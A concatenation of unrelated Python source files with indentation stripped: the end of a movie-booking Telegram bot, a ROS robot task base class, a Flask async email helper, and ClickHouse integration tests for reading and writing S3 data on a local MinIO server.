self.send_message(self.bot, chat_id, BOOKING_OPEN.format(url))
print(BOOK_MSG)
else:
self.send_message(self.bot, chat_id, CHECKING)
print(CHECKING_MSG)
def send_message(self, bot, c_id, message):
print(SENDING)
bot.send_message(c_id, message)
def requester(self):
while True:
if len(self.USER_MAPPING.keys()) != 0:
for chat_id, msg in self.USER_MAPPING.items():
self._make_request(chat_id, msg)
time.sleep(SNOOZE_TIME)
def monitor(self):
d = threading.Thread(name=THREAD_NAME, target=self.requester)
d.setDaemon(True)
d.start()
class CheckService(Check_Movie):
def __init__(self):
parser = argparse.ArgumentParser(description="Movie Availablity Check API.")
parser.add_argument("-BK", "--bot-key", type=str, help="Attach bot_key.")
args = parser.parse_args()
super().__init__(args.bot_key)
if __name__ == "__main__":
CheckService()
|
base.py
|
#!/usr/bin/env python
import json
import threading
import actionlib
import dynamic_reconfigure.client
from geometry_msgs.msg import PoseWithCovarianceStamped
import rospy
import std_msgs.msg as ros_msg
from std_srvs.srv import Empty, EmptyRequest, EmptyResponse
from kobuki_msgs.msg import WheelDropEvent
from needybot.services.base import BaseService, BaseServiceClient
from needybot.lib import cable
import needybot.lib.channels as nb_channels
from needybot.lib.logger import *
from needybot.lib.patterns import Singleton
from needybot.lib.needybot_blackboard import NeedybotBlackboard
from needybot.lib.task_latcher import TaskLatcher
from needybot.lib.utils import build_payload
from needybot_srvs.srv import *
class TaskStepStatus(object):
FAILURE = 'failure'
RUNNING = 'running'
SUCCESS = 'success'
class TaskStep(object):
def __init__(self, name, blocking=False, timeout=0, success_step='complete', failure_step='abort',
timeout_step='abort', entered_handler=None, exited_handler=None, screen_delay=0, instructions=None):
self.timeout = timeout
self.name = name # This step's name
self.success_step = success_step # Instructions for the task server, tells it which step to move to when we recieve a success message from the usb screen
self.failure_step = failure_step # Step to move to when we recieve a failure response from the usb screen
self.timeout_step = timeout_step # Step to move to when we recieve a timeout response from the usb screen
self.entered_handler = entered_handler # Callback for when the step is enetered
self.exited_handler = exited_handler # Callback for when the step is exited
self.blocking = blocking
self.instructions = instructions
self._task_name = ''
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, val):
self._task_name = val
self.failure_pub = rospy.Publisher(
'/needybot/{}/step/failure'.format(self._task_name),
ros_msg.Empty,
queue_size=1
)
self.success_pub = rospy.Publisher(
'/needybot/{}/step/success'.format(self._task_name),
ros_msg.Empty,
queue_size=1
)
def enter(self):
if self.entered_handler:
self.entered_handler(self)
def exit(self):
if self.exited_handler:
self.exited_handler(self)
def fail(self):
self.failure_pub.publish(ros_msg.Empty())
def payload(self):
return {
'name': self.name,
'success_step': self.success_step,
'failure_step': self.failure_step,
'timeout': self.timeout,
'screen_delay': self.screen_delay
}
def succeed(self):
self.success_pub.publish(ros_msg.Empty())
class TaskStepSequence(object):
def __init__(self, steps, task_name, step_prefix=None):
if len(steps) == 0:
logerr("TaskStepSequence must have 1 or more steps.")
self.nb_blackboard = NeedybotBlackboard()
# Setup steps dictionary
self.steps = {}
self.step_prefix = step_prefix
for step in steps:
# Add prefix to step names
step.name = self.prefix_name(step.name)
self.steps[step.name] = step
self.task_name = task_name
def prefix_name(self, step_name):
if self.step_prefix:
return '{}_{}'.format(self.step_prefix, step_name)
return step_name
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, val):
self._task_name = val
self.step_serve_pub = rospy.Publisher(
'/needybot/{}/step/serve'.format(self._task_name),
ros_msg.String,
queue_size=1
)
class Task(BaseService):
"""
Parent class for all Needybot tasks.
Uses the singleton pattern to ensure that child tasks are only ever created
once each.
"""
def __init__(self, name):
super(Task, self).__init__(name, rospy.Rate(50))
self.nb_blackboard = NeedybotBlackboard()
self.lock = threading.Lock()
# Flags
self.active = False
self.completed = False
self.did_fail = False
self.current_step = None
self.name = name
self.subscribers = []
self.step_timer = None
self.steps = {}
self.task_latcher = TaskLatcher()
self.task_latcher.register_task()
self.step_load_time = None
self.paused_time = None
self.paused = False
self.register_services([
('abort', AbortTask),
('step_name', Message),
('next_step', NextStep),
('task_payload', TaskPayload),
('reset', Empty),
('status', TaskStatus),
('step', StepTask)
])
self.add_steps([
TaskStep(
'load',
failure_step='abort',
success_step='complete',
entered_handler=self.load_entered
),
TaskStep(
'complete',
entered_handler=self.complete_entered
),
TaskStep(
'abort',
entered_handler=self.abort_entered,
blocking=True
),
])
def abort(self, req=None):
"""
Service function for the aborting the task '[name]_abort'.
handles a shutdown of the task but instead of calling signal_complete,
this method calls `signal_aborted`, which lets the task server know
that it can proceed with launching a mayday task (as opposed to queueing
up another general task).
Args:
msg (std_msgs.msg.String): the message received through the
subscriber channel.
"""
if not self.active:
logwarn("Can't abort {} because task isn't active.".format(self.name))
return False
self.instruct()
self.prep_shutdown(did_fail=True)
return True
def add_step(self, instance):
# If the array item is a squence, flatten it's steps into the steps array
if isinstance(instance, TaskStep):
self.steps[instance.name] = instance
self.steps[instance.name].task_name = self.name
return
for key, step in instance.steps.iteritems():
self.steps[step.name] = step
self.steps[step.name].task_name = self.name
def add_steps(self, steps):
for step in steps:
self.add_step(step)
def add_subscribers(self):
self.subscribers = [
rospy.Subscriber(
nb_channels.Messages.replay.value,
ros_msg.Empty,
self.replay_handler
),
rospy.Subscriber(
nb_channels.Messages.cancel_timer.value,
ros_msg.Empty,
self.cancel_timer_handler
),
rospy.Subscriber(
nb_channels.Messages.reset_timer.value,
ros_msg.Empty,
self.reset_timer_handler
),
rospy.Subscriber(
nb_channels.Safety.picked_up.value,
ros_msg.Empty,
self.picked_up_handler
),
rospy.Subscriber(
nb_channels.Safety.put_down.value,
ros_msg.Empty,
self.put_down_handler
)
]
def audio_done_instruct_cb(self, state, result):
self.instruct()
def abort_entered(self, step):
"""
Step entered handler that aborts the task.
"""
self.abort()
def cancel_timer(self):
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
def cancel_timer_handler(self, msg):
self.cancel_timer()
def complete_entered(self, step):
"""
Step entered handler that signals the task server that the task is complete.
"""
self.task_shutdown()
def load_entered(self, step):
"""
Step entered handler for the load step:
where {task} is a child of this super class.
*The incoming message is expected to arrive from the task server,
although this class should never be invoked; this is a method for
subclasses of this super class, referenced by {task} above.
Responsible for loading up the task, setting initial property values,
and beginning task/step countdown timers.
The final steps are to publish to the iPad (and any future listeners)
to signal that the task is ready, and then to play audio that accompanies
the task load-up.
Args:
req (LoadTaskRequest): LoadTask service request
Returns:
succes (Bool): Whether or not task loading was successful
"""
self.add_subscribers()
self.instruct()
def pause(self):
self.paused_time = rospy.Time.now()
self.paused = True
if self.step_timer:
self.step_timer.shutdown()
self.step_timer = None
def picked_up_handler(self, msg):
self.cancel_timer()
def put_down_handler(self, msg):
self.reset_timer()
def replay_handler(self, msg):
"""
Resets the step timer everytime the replay button is tapped on the iPad
"""
self.update_step_timer(self.current_step)
def reset(self, req=None):
# Reset flags
self.active = True
self.did_fail = False
self.completed = False
return EmptyResponse()
def reset_timer(self):
self.update_step_timer(self.current_step)
def reset_timer_handler(self, msg):
self.reset_timer()
def resume(self):
if not self.paused:
return
self.paused = False
if self.current_step.timeout > 0:
self.step_timer = rospy.Timer(
rospy.Duration(self.current_step.timeout - (self.paused_time - self.step_load_time)),
self.step_to_handler,
oneshot=True
)
self.paused_time = None
def shutdown(self):
super(Task, self).shutdown()
self.task_latcher.unregister()
def step_load(self, step):
# If listeneing for any responses from the iPad, disable the subscriber
if self.current_step and self.current_step.exited_handler:
self.current_step.exited_handler(self.current_step, step)
self.current_step = step
self.step_load_time = rospy.Time.now()
self.update_step_timer(self.current_step)
self.task_latcher.step_task(self.current_step.name)
# Checks if step should block, by default it will toss it into it's own thread
if self.current_step.entered_handler:
if self.current_step.blocking:
self.current_step.entered_handler(self.current_step)
else:
entered_thread = threading.Thread(target=self.current_step.entered_handler, args=[self.current_step])
entered_thread.start()
def prep_shutdown(self, did_fail=False):
"""
Handles:
* resetting instance values to their defaults
* shutting down the task and step timers
* stopping the fishing client
* updating the emotional value of Needybot
* informing the iPad that the task is finished
Kwargs:
did_fail (bool): whether or not the task failed [Default: False]
"""
self.active = False
self.remove_subscribers()
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
self.step_timer = None
self.did_fail = did_fail
def remove_subscribers(self):
for sub in self.subscribers:
sub.unregister()
def step_name(self, req):
return MessageResponse(value=self.current_step.name)
def next_step(self, req):
"""
Service method that takes the returned status from the iPad and returns
either the name of the next step, or None if no step is defined for
the current step's failure outcome
Args:
success_Step (bool): whether the previous step in the task was
successful or not.
Returns:
string: the name of the next step, if any
None: if no step is available, returns None
"""
with self.lock:
if not self.current_step:
logwarn("Can't retrieve next step name. Current step is not set.")
return NextStepResponse(name='')
step = self.current_step
if req.status == TaskStepStatus.SUCCESS:
return NextStepResponse(name=step.success_step)
elif req.status == TaskStepStatus.FAILURE:
return NextStepResponse(name=step.failure_step)
elif req.status == TaskStepStatus.TIMEOUT:
return NextStepResponse(name=step.timeout_step)
def serve_step(self, name):
step = self.steps.get(name, None)
if not step:
logerr("Can't find step {} of task {} to serve".format(name, self.name))
return False
self.step_load(step)
return True
def startup(self):
"""
Helper method to fire up the task and keep it alive.
"""
while not rospy.is_shutdown():
self.rate.sleep()
def status(self, req):
"""
Service function. Returns status of this task.
"""
with self.lock:
return self.which_status()
def step(self, req):
with self.lock:
step = self.steps.get(req.name, None)
if not step:
logerr("Problem loading step {}. Make sure request's name is set properly.".format(req.name))
return StepTaskResponse()
res = StepTaskResponse()
res.success = False
if step:
self.step_load(step)
res.success = True
return res
def step_to_handler(self, msg):
if self.current_step.timeout_step:
self.serve_step(self.current_step.timeout_step)
else:
self.task_failed()
def task_failed(self):
"""
Method that takes care of neecessary details before
"""
rospy.logwarn("Task failed. Shutting it down.")
self.active = False
self.task_shutdown(True)
def task_payload(self, req):
"""
Service call that returns the payload information for this task.
Mainly used to pass data b/t running tasks.
"""
with self.lock:
res = TaskPayloadResponse(
name=self.name,
status=self.which_status(),
did_fail=self.did_fail
)
return res
def task_shutdown(self, did_fail=False):
"""
Helper method responsible for shutting a task down.
Resets values to their defaults, shuts down timeout counters,
and notifies the iPad and task server node of its completion.
Args:
complete_handler (function): the handler method to run after
shutting down. [Default: self.signal_complete]
"""
self.prep_shutdown(did_fail)
self.completed = True if not did_fail else False
def update_step_timer(self, step):
"""
Helper method that shuts the current step timer down, then recreates
the step timer for the next step in the task.
If the step timeout is zero, do not create a new timeout; otherwise
create a new timer using the timeout value.
Args:
step (dict): the dictionary object representing the task step.
"""
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
if not self.active:
return
if step and step.timeout > 0:
self.step_timer = rospy.Timer(
rospy.Duration(step.timeout),
self.step_to_handler,
oneshot=True
)
def which_status(self):
status = TaskStatusRequest.INACTIVE
if self.did_fail:
status = TaskStatusRequest.FAILED
elif self.completed:
status = TaskStatusRequest.COMPLETED
elif self.active:
status = TaskStatusRequest.RUNNING
return status
def instruct(self):
"""
Helper function to send messages to the iPad.
This needs to be called manually and will be called automatically
for every step.
"""
if self.current_step and self.current_step.instructions:
cable.instruct(self.current_step.instructions)
|
emails.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_mail(subject='New comment', to=current_app.config['BLUELOG_EMAIL'],
html='<p>New comment in post <i>%s</i>, click the link below to check:</p>'
'<p><a href="%s">%s</a></P>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_mail(subject='New reply', to=comment.email,
html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>'
'<p><a href="%s">%s</a></p>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (comment.post.title, post_url, post_url))
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
from helpers.network import PartitionManager
from helpers.test_tools import exec_query_with_retry
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml", "configs/named_collections.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values settings s3_truncate_on_insert=1 {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
def test_partition_by(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
partition_by = "column3"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test_45.csv")
filename = "test2_{_partition_id}.csv"
instance.query(f"create table p ({table_format}) engine=S3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV') partition by column3")
instance.query(f"insert into p values {values}")
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test2_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test2_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test2_45.csv")
def test_partition_by_string_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "col_num UInt32, col_str String"
partition_by = "col_str"
values = "(1, 'foo/bar'), (3, 'йцук'), (78, '你好')"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert '1,"foo/bar"\n' == get_s3_file_content(started_cluster, bucket, "test_foo/bar.csv")
assert '3,"йцук"\n' == get_s3_file_content(started_cluster, bucket, "test_йцук.csv")
assert '78,"你好"\n' == get_s3_file_content(started_cluster, bucket, "test_你好.csv")
def test_partition_by_const_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
partition_by = "'88'"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert values_csv == get_s3_file_content(started_cluster, bucket, "test_88.csv")
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
drop_empty_table_query = "DROP TABLE IF EXISTS empty_table"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, drop_empty_table_query)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV settings s3_truncate_on_insert=1".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
unique_prefix = random.randint(1,10000)
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}/{}_{}/{}.csv".format(unique_prefix, i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, unique_prefix, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
minio = started_cluster.minio_client
for obj in list(minio.list_objects(started_cluster.minio_bucket, prefix='{}/'.format(unique_prefix), recursive=True)):
minio.remove_object(started_cluster.minio_bucket, obj.object_name)
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
def test_wrong_s3_syntax(started_cluster):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('', '', '', '', '', '')"
assert expected_err_msg in instance.query_and_get_error(query)
expected_err_msg = "Code: 36" # BAD_ARGUMENTS
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('')"
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
